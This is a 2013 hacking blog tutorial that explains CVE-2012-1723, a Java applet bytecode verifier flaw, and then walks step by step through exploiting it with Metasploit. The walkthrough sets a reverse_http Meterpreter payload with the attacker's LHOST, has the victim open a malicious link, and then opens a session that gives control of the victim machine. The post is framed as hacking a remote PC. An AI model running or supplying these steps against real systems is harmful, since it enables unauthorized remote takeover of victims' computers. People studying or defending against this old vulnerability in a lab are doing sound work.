LATEST: We are offering PENTESTING and WEB DEVELOPMENT service with low price Learn More

5/03/2013

Hacking Remote Pc by Exploiting Java Applet Field Bytecode Verifier Cache Remote Code Execution

CVE-2012-1723: A vulnerability in the HotSpot bytecode verifier where an invalid optimization of GETFIELD/PUTFIELD/GETSTATIC/PUTSTATIC instructions leads to insufficient type checking. A specially-crafted class file could possibly use this flaw to bypass Java sandbox restrictions, and load additional classes in order to perform malicious operations. The vulnerability was made public by Michael ‘mihi’ Schierl.

Requirement:

  • Attacker Machine: Backtrack
  • Victim Machine: Windows (install JRE un-patched version  )
Step1: Launch the Metasploit console
Open the Terminal in the Attacker Machine(Backtrack).
Type "msfupdate" , this will update the metasploit with latest modules.
Now type "msfconsole" to get interaction with the Metasploit framework.

Step 2:
Type "use exploit/multi/browser/java_verifier_field_access" and follow the below commands:


msf exploit(java_verifier_field_access) > set PAYLOAD java/meterpreter/reverse_http
msf exploit(java_verifier_field_access) > set LHOST [Backtrack IP ADDRESS]
msf exploit(java_verifier_field_access) > exploit

If you don't know what i am talking about , please read my previous tutorial.

Step 3:
If you follow the above commands correctly, you will get the following result.

Copy the url and open the link in the victim machine. Once the url loaded in the victim machine, it will launch the exploit and creates a new session.

Now type "sessions", this will show the list of active sessions .

Type "sessions -i 1", this will open the connection to the session with the id '1' and bring you to Meterpreter. Meterpreter will help you to interact/control the Target.

References:
  • POC: http://schierlm.users.sourceforge.net/CVE-2012-1723.html
  • Metasploit Module: http://www.exploit-db.com/exploits/19717/

About Author:

Hi, Its me Aamir Khan, Owner of HACKING ARTICLES. I am an Ethical Hacker, Pro Blogger, addicted Web Developer and Security Researcher with experience in various aspects of Information Security. I am from Pakistan.Hacking is my passion and i wanna myself to be called as a LEGEND in this field.

Follow him @ Twitter | Facebook


0 comments:

Post a Comment

Your feedback is always appreciated. We will try to reply to your queries as soon as time allows.
Note:
1. Make sure to click the "Subscribe By Email" link below the comment to be notified of follow up comments and replies.
2. Please "Do Not Spam" - Spam comments will be deleted immediately upon our review.
3. Please "Do Not Add Links" to the body of your comment as they will not be published.
4. Only "English" comments shall be approved.
5. If you have a problem check first the comments, maybe you will find the solution there.